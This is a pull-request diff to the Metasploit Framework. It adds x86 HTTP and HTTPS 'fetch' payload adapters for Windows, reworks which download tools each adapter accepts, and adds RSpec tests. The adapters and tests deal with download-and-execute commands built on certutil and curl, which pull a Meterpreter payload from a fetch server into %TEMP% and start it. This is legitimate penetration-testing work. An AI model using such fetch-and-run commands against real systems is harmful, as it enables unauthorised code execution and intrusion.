### PR TITLE
Add HTTP and HTTPS fetch payloads for Windows x86

### DIFF
--- a/lib/msf/core/payload/adapter/fetch.rb
+++ b/lib/msf/core/payload/adapter/fetch.rb
@@ -278,7 +278,6 @@ module Msf::Payload::Adapter::Fetch
       # I don't think there is a way to disable cert check in certutil....
       print_error('CERTUTIL binary does not support insecure mode')
       fail_with(Msf::Module::Failure::BadConfig, 'FETCH_CHECK_CERT must be true when using CERTUTIL')
-      get_file_cmd = "certutil -urlcache -f https://#{download_uri} #{_remote_destination}"
     else
       fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
     end

--- a/lib/msf/core/payload/adapter/fetch/windows_options.rb
+++ b/lib/msf/core/payload/adapter/fetch/windows_options.rb
@@ -4,7 +4,7 @@ module Msf::Payload::Adapter::Fetch::WindowsOptions
     super
     register_options(
       [
-        Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w{ CURL TFTP CERTUTIL }]),
+        Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CERTUTIL', %w{ CURL TFTP CERTUTIL }]),
         Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces or slashes', Rex::Text.rand_text_alpha(rand(8..12))], regex: %r{^[^\s/\\]*$}),
         Msf::OptBool.new('FETCH_PIPE', [true, 'Host both the binary payload and the command so it can be piped directly to the shell.', false], conditions: ['FETCH_COMMAND', 'in', %w[CURL]]),
         Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces.', '%TEMP%'], regex:/^[\S]*$/)

--- a/modules/payloads/adapters/cmd/windows/http/x64.rb
+++ b/modules/payloads/adapters/cmd/windows/http/x64.rb
@@ -13,7 +13,6 @@ module MetasploitModule
         info,
         'Name' => 'HTTP Fetch',
         'Description' => 'Fetch and execute an x64 payload from an HTTP server.',
-        'DefaultOptions' => { 'FETCH_COMMAND' => 'CERTUTIL' },
         'Author' => 'Brendan Watters',
         'Platform' => 'win',
         'Arch' => ARCH_CMD,
@@ -25,7 +24,7 @@ module MetasploitModule
     deregister_options('FETCH_COMMAND')
     register_options(
       [
-        Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CERTUTIL', %w[CURL TFTP CERTUTIL]])
+        Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CERTUTIL', %w[CURL CERTUTIL]])
       ]
     )
   end

--- a/modules/payloads/adapters/cmd/windows/http/x86.rb
+++ b/modules/payloads/adapters/cmd/windows/http/x86.rb
@@ -13,7 +13,6 @@ module MetasploitModule
         info,
         'Name' => 'HTTP Fetch',
         'Description' => 'Fetch and execute an x86 payload from an HTTP server.',
-        'DefaultOptions' => { 'FETCH_COMMAND' => 'CERTUTIL' },
         'Author' => 'Brendan Watters',
         'Platform' => 'win',
         'Arch' => ARCH_CMD,
@@ -25,7 +24,7 @@ module MetasploitModule
     deregister_options('FETCH_COMMAND')
     register_options(
       [
-        Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CERTUTIL', %w[CURL TFTP CERTUTIL]])
+        Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CERTUTIL', %w[CURL CERTUTIL]])
       ]
     )
   end

--- a/modules/payloads/adapters/cmd/windows/http/x86.rb
+++ b/modules/payloads/adapters/cmd/windows/http/x86.rb
@@ -1,0 +1,32 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+  include Msf::Payload::Adapter::Fetch::HTTP
+  include Msf::Payload::Adapter::Fetch::WindowsOptions
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'HTTP Fetch',
+        'Description' => 'Fetch and execute an x86 payload from an HTTP server.',
+        'DefaultOptions' => { 'FETCH_COMMAND' => 'CERTUTIL' },
+        'Author' => 'Brendan Watters',
+        'Platform' => 'win',
+        'Arch' => ARCH_CMD,
+        'License' => MSF_LICENSE,
+        'AdaptedArch' => ARCH_X86,
+        'AdaptedPlatform' => 'win'
+      )
+    )
+    deregister_options('FETCH_COMMAND')
+    register_options(
+      [
+        Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CERTUTIL', %w[CURL TFTP CERTUTIL]])
+      ]
+    )
+  end
+end

--- a/modules/payloads/adapters/cmd/windows/https/x64.rb
+++ b/modules/payloads/adapters/cmd/windows/https/x64.rb
@@ -21,5 +21,12 @@ module MetasploitModule
         'AdaptedPlatform' => 'win'
       )
     )
+    deregister_options('FETCH_COMMAND')
+    register_options(
+      [
+        # Certutil does not support insecure mode
+        Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w[CURL]])
+      ]
+    )
   end
 end

--- a/modules/payloads/adapters/cmd/windows/https/x86.rb
+++ b/modules/payloads/adapters/cmd/windows/https/x86.rb
@@ -21,5 +21,12 @@ module MetasploitModule
         'AdaptedPlatform' => 'win'
       )
     )
+    deregister_options('FETCH_COMMAND')
+    register_options(
+      [
+        # Certutil does not support insecure mode
+        Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w[CURL]])
+      ]
+    )
   end
 end

--- a/modules/payloads/adapters/cmd/windows/https/x86.rb
+++ b/modules/payloads/adapters/cmd/windows/https/x86.rb
@@ -1,0 +1,25 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+  include Msf::Payload::Adapter::Fetch::Https
+  include Msf::Payload::Adapter::Fetch::WindowsOptions
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'HTTPS Fetch',
+        'Description' => 'Fetch and execute an x86 payload from an HTTPS server.',
+        'Author' => 'Brendan Watters',
+        'Platform' => 'win',
+        'Arch' => ARCH_CMD,
+        'License' => MSF_LICENSE,
+        'AdaptedArch' => ARCH_X86,
+        'AdaptedPlatform' => 'win'
+      )
+    )
+  end
+end

--- a/modules/payloads/adapters/cmd/windows/smb/x64.rb
+++ b/modules/payloads/adapters/cmd/windows/smb/x64.rb
@@ -20,7 +20,7 @@ module MetasploitModule
         'AdaptedPlatform' => 'win'
       )
     )
-    deregister_options('FETCH_DELETE', 'FETCH_SRVPORT', 'FETCH_WRITABLE_DIR', 'FETCH_FILENAME')
+    deregister_options('FETCH_COMMAND', 'FETCH_DELETE', 'FETCH_SRVPORT', 'FETCH_WRITABLE_DIR', 'FETCH_FILENAME')
   end
 
   def srvport

--- a/modules/payloads/adapters/cmd/windows/tftp/x64.rb
+++ b/modules/payloads/adapters/cmd/windows/tftp/x64.rb
@@ -21,5 +21,11 @@ module MetasploitModule
         'AdaptedPlatform' => 'win'
       )
     )
+    deregister_options('FETCH_COMMAND')
+    register_options(
+      [
+        Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'TFTP', %w[TFTP]])
+      ]
+    )
   end
 end

--- a/spec/modules/payloads/adapters/cmd/windows/http/x64_spec.rb
+++ b/spec/modules/payloads/adapters/cmd/windows/http/x64_spec.rb
@@ -1,0 +1,192 @@
+require 'rspec'
+
+RSpec.describe 'cmd/windows/http/x64' do
+  include_context 'Msf::Simple::Framework#modules loading'
+
+  # Adapter payloads cannot be instantiated standalone; they must be combined
+  # with a compatible single payload. We use windows/x64/meterpreter_reverse_tcp
+  # (ARCH_X64, Platform=win) so the adapter's generate_fetch_commands can be
+  # exercised.
+  let(:subject) do
+    load_and_create_module(
+      module_type: 'payload',
+      reference_name: 'cmd/windows/http/x64/meterpreter_reverse_tcp',
+      ancestor_reference_names: [
+        'adapters/cmd/windows/http/x64',
+        'singles/windows/x64/meterpreter_reverse_tcp'
+      ]
+    )
+  end
+
+  let(:lhost) { '192.168.1.100' }
+  let(:lport) { '4444' }
+  let(:fetch_srvhost) { '192.168.1.100' }
+  let(:fetch_srvport) { 8080 }
+  let(:fetch_uripath) { 'testpayload' }
+  let(:fetch_command) { 'CERTUTIL' }
+  let(:fetch_filename) { 'payload' }
+  let(:fetch_writable_dir) { '%TEMP%' }
+
+  let(:datastore_values) do
+    {
+      'LHOST' => lhost,
+      'LPORT' => lport,
+      'FETCH_SRVHOST' => fetch_srvhost,
+      'FETCH_SRVPORT' => fetch_srvport,
+      'FETCH_URIPATH' => fetch_uripath,
+      'FETCH_COMMAND' => fetch_command,
+      'FETCH_FILENAME' => fetch_filename,
+      'FETCH_WRITABLE_DIR' => fetch_writable_dir
+    }
+  end
+
+  before(:each) do
+    subject.datastore.merge!(datastore_values)
+  end
+
+  describe 'module metadata' do
+    it 'includes HTTP Fetch in the name' do
+      expect(subject.name).to include('HTTP Fetch')
+    end
+
+    it 'targets the Windows platform' do
+      expect(subject.platform.platforms).to include(Msf::Module::Platform::Windows)
+    end
+
+    it 'uses CMD arch' do
+      expect(subject.arch).to include(ARCH_CMD)
+    end
+
+    it 'adapts x64 payloads' do
+      expect(subject.send(:module_info)['AdaptedArch']).to eq(ARCH_X64)
+    end
+
+    it 'has win as the adapted platform' do
+      expect(subject.send(:module_info)['AdaptedPlatform']).to eq('win')
+    end
+
+    it 'adapts x64 and not x86 payloads' do
+      expect(subject.send(:module_info)['AdaptedArch']).not_to eq(ARCH_X86)
+    end
+  end
+
+  describe 'FETCH_COMMAND option' do
+    it 'defaults to CERTUTIL' do
+      fresh_subject = load_and_create_module(
+        module_type: 'payload',
+        reference_name: 'cmd/windows/http/x64/meterpreter_reverse_tcp',
+        ancestor_reference_names: [
+          'adapters/cmd/windows/http/x64',
+          'singles/windows/x64/meterpreter_reverse_tcp'
+        ]
+      )
+      expect(fresh_subject.datastore['FETCH_COMMAND']).to eq('CERTUTIL')
+    end
+
+    it 'accepts CURL as a valid value' do
+      expect(subject.options['FETCH_COMMAND'].valid?('CURL')).to be(true)
+    end
+
+    it 'accepts TFTP as a valid value' do
+      expect(subject.options['FETCH_COMMAND'].valid?('TFTP')).to be(true)
+    end
+
+    it 'accepts CERTUTIL as a valid value' do
+      expect(subject.options['FETCH_COMMAND'].valid?('CERTUTIL')).to be(true)
+    end
+
+    it 'rejects WGET as an invalid value' do
+      expect(subject.options['FETCH_COMMAND'].valid?('WGET')).to be(false)
+    end
+
+    it 'rejects FTP as an invalid value' do
+      expect(subject.options['FETCH_COMMAND'].valid?('FTP')).to be(false)
+    end
+  end
+
+  describe '#generate_fetch_commands' do
+    context 'with CERTUTIL (default)' do
+      let(:fetch_command) { 'CERTUTIL' }
+
+      it 'generates a certutil download command over HTTP' do
+        cmd = subject.generate_fetch_commands
+        expect(cmd).to include('certutil -urlcache -f http://')
+      end
+
+      it 'includes the fetch server host and port in the URL' do
+        cmd = subject.generate_fetch_commands
+        expect(cmd).to include("#{fetch_srvhost}:#{fetch_srvport}")
+      end
+
+      it 'includes the URI path in the download URL' do
+        cmd = subject.generate_fetch_commands
+        expect(cmd).to include(fetch_uripath)
+      end
+
+      it 'includes the remote destination path' do
+        cmd = subject.generate_fetch_commands
+        expect(cmd).to include("#{fetch_writable_dir}\\#{fetch_filename}.exe")
+      end
+
+      it 'executes the payload with start /B' do
+        cmd = subject.generate_fetch_commands
+        expect(cmd).to include('start /B')
+      end
+
+      it 'does not include del when FETCH_DELETE is false' do
+        subject.datastore['FETCH_DELETE'] = false
+        cmd = subject.generate_fetch_commands
+        expect(cmd).not_to include(' del ')
+      end
+
+      it 'includes del when FETCH_DELETE is true' do
+        subject.datastore['FETCH_DELETE'] = true
+        cmd = subject.generate_fetch_commands
+        expect(cmd).to include(' del ')
+      end
+    end
+
+    context 'with CURL' do
+      let(:fetch_command) { 'CURL' }
+
+      it 'generates a curl download command over HTTP' do
+        cmd = subject.generate_fetch_commands
+        expect(cmd).to include('curl -so')
+        expect(cmd).to include("http://#{fetch_srvhost}:#{fetch_srvport}/#{fetch_uripath}")
+      end
+
+      it 'includes the remote destination path' do
+        cmd = subject.generate_fetch_commands
+        expect(cmd).to include("#{fetch_writable_dir}\\#{fetch_filename}.exe")
+      end
+
+      it 'executes the payload with start /B' do
+        cmd = subject.generate_fetch_commands
+        expect(cmd).to include('start /B')
+      end
+    end
+
+    # The TFTP client requires a TFTP server (fetch_protocol='TFTP'), so using
+    # TFTP as the FETCH_COMMAND with an HTTP adapter always fails at runtime.
+    context 'with TFTP' do
+      let(:fetch_command) { 'TFTP' }
+      let(:fetch_srvport) { 69 }
+
+      it 'raises a bad-config error because the HTTP adapter cannot serve TFTP' do
+        expect { subject.generate_fetch_commands }.to raise_error(RuntimeError, /bad-config/)
+      end
+    end
+  end
+
+  describe '#fetch_protocol' do
+    it 'returns HTTP' do
+      expect(subject.fetch_protocol).to eq('HTTP')
+    end
+  end
+
+  describe '#windows?' do
+    it 'returns true for this Windows platform module' do
+      expect(subject.windows?).to be(true)
+    end
+  end
+end

--- a/spec/modules/payloads/adapters/cmd/windows/http/x64_spec.rb
+++ b/spec/modules/payloads/adapters/cmd/windows/http/x64_spec.rb
@@ -87,8 +87,8 @@ RSpec.describe 'cmd/windows/http/x64' do
       expect(subject.options['FETCH_COMMAND'].valid?('CURL')).to be(true)
     end
 
-    it 'accepts TFTP as a valid value' do
-      expect(subject.options['FETCH_COMMAND'].valid?('TFTP')).to be(true)
+    it 'rejects TFTP as an invalid value' do
+      expect(subject.options['FETCH_COMMAND'].valid?('TFTP')).to be(false)
     end
 
     it 'accepts CERTUTIL as a valid value' do
@@ -166,16 +166,6 @@ RSpec.describe 'cmd/windows/http/x64' do
       end
     end
 
-    # The TFTP client requires a TFTP server (fetch_protocol='TFTP'), so using
-    # TFTP as the FETCH_COMMAND with an HTTP adapter always fails at runtime.
-    context 'with TFTP' do
-      let(:fetch_command) { 'TFTP' }
-      let(:fetch_srvport) { 69 }
-
-      it 'raises a bad-config error because the HTTP adapter cannot serve TFTP' do
-        expect { subject.generate_fetch_commands }.to raise_error(RuntimeError, /bad-config/)
-      end
-    end
   end
 
   describe '#fetch_protocol' do

--- a/spec/modules/payloads/adapters/cmd/windows/http/x86_spec.rb
+++ b/spec/modules/payloads/adapters/cmd/windows/http/x86_spec.rb
@@ -87,8 +87,8 @@ RSpec.describe 'cmd/windows/http/x86' do
       expect(subject.options['FETCH_COMMAND'].valid?('CURL')).to be(true)
     end
 
-    it 'accepts TFTP as a valid value' do
-      expect(subject.options['FETCH_COMMAND'].valid?('TFTP')).to be(true)
+    it 'rejects TFTP as an invalid value' do
+      expect(subject.options['FETCH_COMMAND'].valid?('TFTP')).to be(false)
     end
 
     it 'accepts CERTUTIL as a valid value' do
@@ -166,16 +166,6 @@ RSpec.describe 'cmd/windows/http/x86' do
       end
     end
 
-    # The TFTP client requires a TFTP server (fetch_protocol='TFTP'), so using
-    # TFTP as the FETCH_COMMAND with an HTTP adapter always fails at runtime.
-    context 'with TFTP' do
-      let(:fetch_command) { 'TFTP' }
-      let(:fetch_srvport) { 69 }
-
-      it 'raises a bad-config error because the HTTP adapter cannot serve TFTP' do
-        expect { subject.generate_fetch_commands }.to raise_error(RuntimeError, /bad-config/)
-      end
-    end
   end
 
   describe '#fetch_protocol' do

--- a/spec/modules/payloads/adapters/cmd/windows/http/x86_spec.rb
+++ b/spec/modules/payloads/adapters/cmd/windows/http/x86_spec.rb
@@ -1,0 +1,192 @@
+require 'rspec'
+
+RSpec.describe 'cmd/windows/http/x86' do
+  include_context 'Msf::Simple::Framework#modules loading'
+
+  # Adapter payloads cannot be instantiated standalone; they must be combined
+  # with a compatible single payload. We use windows/meterpreter_reverse_tcp
+  # (ARCH_X86, Platform=win) so the adapter's generate_fetch_commands can be
+  # exercised.
+  let(:subject) do
+    load_and_create_module(
+      module_type: 'payload',
+      reference_name: 'cmd/windows/http/x86/meterpreter_reverse_tcp',
+      ancestor_reference_names: [
+        'adapters/cmd/windows/http/x86',
+        'singles/windows/meterpreter_reverse_tcp'
+      ]
+    )
+  end
+
+  let(:lhost) { '192.168.1.100' }
+  let(:lport) { '4444' }
+  let(:fetch_srvhost) { '192.168.1.100' }
+  let(:fetch_srvport) { 8080 }
+  let(:fetch_uripath) { 'testpayload' }
+  let(:fetch_command) { 'CERTUTIL' }
+  let(:fetch_filename) { 'payload' }
+  let(:fetch_writable_dir) { '%TEMP%' }
+
+  let(:datastore_values) do
+    {
+      'LHOST' => lhost,
+      'LPORT' => lport,
+      'FETCH_SRVHOST' => fetch_srvhost,
+      'FETCH_SRVPORT' => fetch_srvport,
+      'FETCH_URIPATH' => fetch_uripath,
+      'FETCH_COMMAND' => fetch_command,
+      'FETCH_FILENAME' => fetch_filename,
+      'FETCH_WRITABLE_DIR' => fetch_writable_dir
+    }
+  end
+
+  before(:each) do
+    subject.datastore.merge!(datastore_values)
+  end
+
+  describe 'module metadata' do
+    it 'includes HTTP Fetch in the name' do
+      expect(subject.name).to include('HTTP Fetch')
+    end
+
+    it 'targets the Windows platform' do
+      expect(subject.platform.platforms).to include(Msf::Module::Platform::Windows)
+    end
+
+    it 'uses CMD arch' do
+      expect(subject.arch).to include(ARCH_CMD)
+    end
+
+    it 'adapts x86 payloads' do
+      expect(subject.send(:module_info)['AdaptedArch']).to eq(ARCH_X86)
+    end
+
+    it 'has win as the adapted platform' do
+      expect(subject.send(:module_info)['AdaptedPlatform']).to eq('win')
+    end
+
+    it 'adapts x86 and not x64 payloads' do
+      expect(subject.send(:module_info)['AdaptedArch']).not_to eq(ARCH_X64)
+    end
+  end
+
+  describe 'FETCH_COMMAND option' do
+    it 'defaults to CERTUTIL' do
+      fresh_subject = load_and_create_module(
+        module_type: 'payload',
+        reference_name: 'cmd/windows/http/x86/meterpreter_reverse_tcp',
+        ancestor_reference_names: [
+          'adapters/cmd/windows/http/x86',
+          'singles/windows/meterpreter_reverse_tcp'
+        ]
+      )
+      expect(fresh_subject.datastore['FETCH_COMMAND']).to eq('CERTUTIL')
+    end
+
+    it 'accepts CURL as a valid value' do
+      expect(subject.options['FETCH_COMMAND'].valid?('CURL')).to be(true)
+    end
+
+    it 'accepts TFTP as a valid value' do
+      expect(subject.options['FETCH_COMMAND'].valid?('TFTP')).to be(true)
+    end
+
+    it 'accepts CERTUTIL as a valid value' do
+      expect(subject.options['FETCH_COMMAND'].valid?('CERTUTIL')).to be(true)
+    end
+
+    it 'rejects WGET as an invalid value' do
+      expect(subject.options['FETCH_COMMAND'].valid?('WGET')).to be(false)
+    end
+
+    it 'rejects FTP as an invalid value' do
+      expect(subject.options['FETCH_COMMAND'].valid?('FTP')).to be(false)
+    end
+  end
+
+  describe '#generate_fetch_commands' do
+    context 'with CERTUTIL (default)' do
+      let(:fetch_command) { 'CERTUTIL' }
+
+      it 'generates a certutil download command over HTTP' do
+        cmd = subject.generate_fetch_commands
+        expect(cmd).to include('certutil -urlcache -f http://')
+      end
+
+      it 'includes the fetch server host and port in the URL' do
+        cmd = subject.generate_fetch_commands
+        expect(cmd).to include("#{fetch_srvhost}:#{fetch_srvport}")
+      end
+
+      it 'includes the URI path in the download URL' do
+        cmd = subject.generate_fetch_commands
+        expect(cmd).to include(fetch_uripath)
+      end
+
+      it 'includes the remote destination path' do
+        cmd = subject.generate_fetch_commands
+        expect(cmd).to include("#{fetch_writable_dir}\\#{fetch_filename}.exe")
+      end
+
+      it 'executes the payload with start /B' do
+        cmd = subject.generate_fetch_commands
+        expect(cmd).to include('start /B')
+      end
+
+      it 'does not include del when FETCH_DELETE is false' do
+        subject.datastore['FETCH_DELETE'] = false
+        cmd = subject.generate_fetch_commands
+        expect(cmd).not_to include(' del ')
+      end
+
+      it 'includes del when FETCH_DELETE is true' do
+        subject.datastore['FETCH_DELETE'] = true
+        cmd = subject.generate_fetch_commands
+        expect(cmd).to include(' del ')
+      end
+    end
+
+    context 'with CURL' do
+      let(:fetch_command) { 'CURL' }
+
+      it 'generates a curl download command over HTTP' do
+        cmd = subject.generate_fetch_commands
+        expect(cmd).to include('curl -so')
+        expect(cmd).to include("http://#{fetch_srvhost}:#{fetch_srvport}/#{fetch_uripath}")
+      end
+
+      it 'includes the remote destination path' do
+        cmd = subject.generate_fetch_commands
+        expect(cmd).to include("#{fetch_writable_dir}\\#{fetch_filename}.exe")
+      end
+
+      it 'executes the payload with start /B' do
+        cmd = subject.generate_fetch_commands
+        expect(cmd).to include('start /B')
+      end
+    end
+
+    # The TFTP client requires a TFTP server (fetch_protocol='TFTP'), so using
+    # TFTP as the FETCH_COMMAND with an HTTP adapter always fails at runtime.
+    context 'with TFTP' do
+      let(:fetch_command) { 'TFTP' }
+      let(:fetch_srvport) { 69 }
+
+      it 'raises a bad-config error because the HTTP adapter cannot serve TFTP' do
+        expect { subject.generate_fetch_commands }.to raise_error(RuntimeError, /bad-config/)
+      end
+    end
+  end
+
+  describe '#fetch_protocol' do
+    it 'returns HTTP' do
+      expect(subject.fetch_protocol).to eq('HTTP')
+    end
+  end
+
+  describe '#windows?' do
+    it 'returns true for this Windows platform module' do
+      expect(subject.windows?).to be(true)
+    end
+  end
+end

--- a/spec/modules/payloads/adapters/cmd/windows/https/x64_spec.rb
+++ b/spec/modules/payloads/adapters/cmd/windows/https/x64_spec.rb
@@ -87,12 +87,12 @@ RSpec.describe 'cmd/windows/https/x64' do
       expect(subject.options['FETCH_COMMAND'].valid?('CURL')).to be(true)
     end
 
-    it 'accepts TFTP as a valid value' do
-      expect(subject.options['FETCH_COMMAND'].valid?('TFTP')).to be(true)
+    it 'rejects TFTP as an invalid value' do
+      expect(subject.options['FETCH_COMMAND'].valid?('TFTP')).to be(false)
     end
 
-    it 'accepts CERTUTIL as a valid value' do
-      expect(subject.options['FETCH_COMMAND'].valid?('CERTUTIL')).to be(true)
+    it 'rejects CERTUTIL as an invalid value' do
+      expect(subject.options['FETCH_COMMAND'].valid?('CERTUTIL')).to be(false)
     end
 
     it 'rejects WGET as an invalid value' do
@@ -137,25 +137,6 @@ RSpec.describe 'cmd/windows/https/x64' do
       end
     end
 
-    # CERTUTIL does not support HTTPS — it always raises a bad-config error.
-    context 'with CERTUTIL' do
-      let(:fetch_command) { 'CERTUTIL' }
-
-      it 'raises a bad-config error because CERTUTIL does not support HTTPS' do
-        expect { subject.generate_fetch_commands }.to raise_error(RuntimeError, /bad-config/)
-      end
-    end
-
-    # The TFTP client requires a TFTP server (fetch_protocol='TFTP'), so using
-    # TFTP as the FETCH_COMMAND with an HTTPS adapter always fails at runtime.
-    context 'with TFTP' do
-      let(:fetch_command) { 'TFTP' }
-      let(:fetch_srvport) { 69 }
-
-      it 'raises a bad-config error because the HTTPS adapter cannot serve TFTP' do
-        expect { subject.generate_fetch_commands }.to raise_error(RuntimeError, /bad-config/)
-      end
-    end
   end
 
   describe '#fetch_protocol' do

--- a/spec/modules/payloads/adapters/cmd/windows/https/x64_spec.rb
+++ b/spec/modules/payloads/adapters/cmd/windows/https/x64_spec.rb
@@ -1,0 +1,172 @@
+require 'rspec'
+
+RSpec.describe 'cmd/windows/https/x64' do
+  include_context 'Msf::Simple::Framework#modules loading'
+
+  # Adapter payloads cannot be instantiated standalone; they must be combined
+  # with a compatible single payload. We use windows/x64/meterpreter_reverse_tcp
+  # (ARCH_X64, Platform=win) so the adapter's generate_fetch_commands can be
+  # exercised.
+  let(:subject) do
+    load_and_create_module(
+      module_type: 'payload',
+      reference_name: 'cmd/windows/https/x64/meterpreter_reverse_tcp',
+      ancestor_reference_names: [
+        'adapters/cmd/windows/https/x64',
+        'singles/windows/x64/meterpreter_reverse_tcp'
+      ]
+    )
+  end
+
+  let(:lhost) { '192.168.1.100' }
+  let(:lport) { '4444' }
+  let(:fetch_srvhost) { '192.168.1.100' }
+  let(:fetch_srvport) { 8443 }
+  let(:fetch_uripath) { 'testpayload' }
+  let(:fetch_command) { 'CURL' }
+  let(:fetch_filename) { 'payload' }
+  let(:fetch_writable_dir) { '%TEMP%' }
+
+  let(:datastore_values) do
+    {
+      'LHOST' => lhost,
+      'LPORT' => lport,
+      'FETCH_SRVHOST' => fetch_srvhost,
+      'FETCH_SRVPORT' => fetch_srvport,
+      'FETCH_URIPATH' => fetch_uripath,
+      'FETCH_COMMAND' => fetch_command,
+      'FETCH_FILENAME' => fetch_filename,
+      'FETCH_WRITABLE_DIR' => fetch_writable_dir
+    }
+  end
+
+  before(:each) do
+    subject.datastore.merge!(datastore_values)
+  end
+
+  describe 'module metadata' do
+    it 'includes HTTPS Fetch in the name' do
+      expect(subject.name).to include('HTTPS Fetch')
+    end
+
+    it 'targets the Windows platform' do
+      expect(subject.platform.platforms).to include(Msf::Module::Platform::Windows)
+    end
+
+    it 'uses CMD arch' do
+      expect(subject.arch).to include(ARCH_CMD)
+    end
+
+    it 'adapts x64 payloads' do
+      expect(subject.send(:module_info)['AdaptedArch']).to eq(ARCH_X64)
+    end
+
+    it 'has win as the adapted platform' do
+      expect(subject.send(:module_info)['AdaptedPlatform']).to eq('win')
+    end
+
+    it 'adapts x64 and not x86 payloads' do
+      expect(subject.send(:module_info)['AdaptedArch']).not_to eq(ARCH_X86)
+    end
+  end
+
+  describe 'FETCH_COMMAND option' do
+    it 'defaults to CURL' do
+      fresh_subject = load_and_create_module(
+        module_type: 'payload',
+        reference_name: 'cmd/windows/https/x64/meterpreter_reverse_tcp',
+        ancestor_reference_names: [
+          'adapters/cmd/windows/https/x64',
+          'singles/windows/x64/meterpreter_reverse_tcp'
+        ]
+      )
+      expect(fresh_subject.datastore['FETCH_COMMAND']).to eq('CURL')
+    end
+
+    it 'accepts CURL as a valid value' do
+      expect(subject.options['FETCH_COMMAND'].valid?('CURL')).to be(true)
+    end
+
+    it 'accepts TFTP as a valid value' do
+      expect(subject.options['FETCH_COMMAND'].valid?('TFTP')).to be(true)
+    end
+
+    it 'accepts CERTUTIL as a valid value' do
+      expect(subject.options['FETCH_COMMAND'].valid?('CERTUTIL')).to be(true)
+    end
+
+    it 'rejects WGET as an invalid value' do
+      expect(subject.options['FETCH_COMMAND'].valid?('WGET')).to be(false)
+    end
+
+    it 'rejects FTP as an invalid value' do
+      expect(subject.options['FETCH_COMMAND'].valid?('FTP')).to be(false)
+    end
+  end
+
+  describe '#generate_fetch_commands' do
+    context 'with CURL (default)' do
+      let(:fetch_command) { 'CURL' }
+
+      it 'generates a curl download command over HTTPS' do
+        cmd = subject.generate_fetch_commands
+        expect(cmd).to include('curl -sko')
+        expect(cmd).to include("https://#{fetch_srvhost}:#{fetch_srvport}/#{fetch_uripath}")
+      end
+
+      it 'includes the remote destination path' do
+        cmd = subject.generate_fetch_commands
+        expect(cmd).to include("#{fetch_writable_dir}\\#{fetch_filename}.exe")
+      end
+
+      it 'executes the payload with start /B' do
+        cmd = subject.generate_fetch_commands
+        expect(cmd).to include('start /B')
+      end
+
+      it 'does not include del when FETCH_DELETE is false' do
+        subject.datastore['FETCH_DELETE'] = false
+        cmd = subject.generate_fetch_commands
+        expect(cmd).not_to include(' del ')
+      end
+
+      it 'includes del when FETCH_DELETE is true' do
+        subject.datastore['FETCH_DELETE'] = true
+        cmd = subject.generate_fetch_commands
+        expect(cmd).to include(' del ')
+      end
+    end
+
+    # CERTUTIL does not support HTTPS — it always raises a bad-config error.
+    context 'with CERTUTIL' do
+      let(:fetch_command) { 'CERTUTIL' }
+
+      it 'raises a bad-config error because CERTUTIL does not support HTTPS' do
+        expect { subject.generate_fetch_commands }.to raise_error(RuntimeError, /bad-config/)
+      end
+    end
+
+    # The TFTP client requires a TFTP server (fetch_protocol='TFTP'), so using
+    # TFTP as the FETCH_COMMAND with an HTTPS adapter always fails at runtime.
+    context 'with TFTP' do
+      let(:fetch_command) { 'TFTP' }
+      let(:fetch_srvport) { 69 }
+
+      it 'raises a bad-config error because the HTTPS adapter cannot serve TFTP' do
+        expect { subject.generate_fetch_commands }.to raise_error(RuntimeError, /bad-config/)
+      end
+    end
+  end
+
+  describe '#fetch_protocol' do
+    it 'returns HTTPS' do
+      expect(subject.fetch_protocol).to eq('HTTPS')
+    end
+  end
+
+  describe '#windows?' do
+    it 'returns true for this Windows platform module' do
+      expect(subject.windows?).to be(true)
+    end
+  end
+end

--- a/spec/modules/payloads/adapters/cmd/windows/https/x86_spec.rb
+++ b/spec/modules/payloads/adapters/cmd/windows/https/x86_spec.rb
@@ -87,12 +87,12 @@ RSpec.describe 'cmd/windows/https/x86' do
       expect(subject.options['FETCH_COMMAND'].valid?('CURL')).to be(true)
     end
 
-    it 'accepts TFTP as a valid value' do
-      expect(subject.options['FETCH_COMMAND'].valid?('TFTP')).to be(true)
+    it 'rejects TFTP as an invalid value' do
+      expect(subject.options['FETCH_COMMAND'].valid?('TFTP')).to be(false)
     end
 
-    it 'accepts CERTUTIL as a valid value' do
-      expect(subject.options['FETCH_COMMAND'].valid?('CERTUTIL')).to be(true)
+    it 'rejects CERTUTIL as an invalid value' do
+      expect(subject.options['FETCH_COMMAND'].valid?('CERTUTIL')).to be(false)
     end
 
     it 'rejects WGET as an invalid value' do
@@ -137,25 +137,6 @@ RSpec.describe 'cmd/windows/https/x86' do
       end
     end
 
-    # CERTUTIL does not support HTTPS — it always raises a bad-config error.
-    context 'with CERTUTIL' do
-      let(:fetch_command) { 'CERTUTIL' }
-
-      it 'raises a bad-config error because CERTUTIL does not support HTTPS' do
-        expect { subject.generate_fetch_commands }.to raise_error(RuntimeError, /bad-config/)
-      end
-    end
-
-    # The TFTP client requires a TFTP server (fetch_protocol='TFTP'), so using
-    # TFTP as the FETCH_COMMAND with an HTTPS adapter always fails at runtime.
-    context 'with TFTP' do
-      let(:fetch_command) { 'TFTP' }
-      let(:fetch_srvport) { 69 }
-
-      it 'raises a bad-config error because the HTTPS adapter cannot serve TFTP' do
-        expect { subject.generate_fetch_commands }.to raise_error(RuntimeError, /bad-config/)
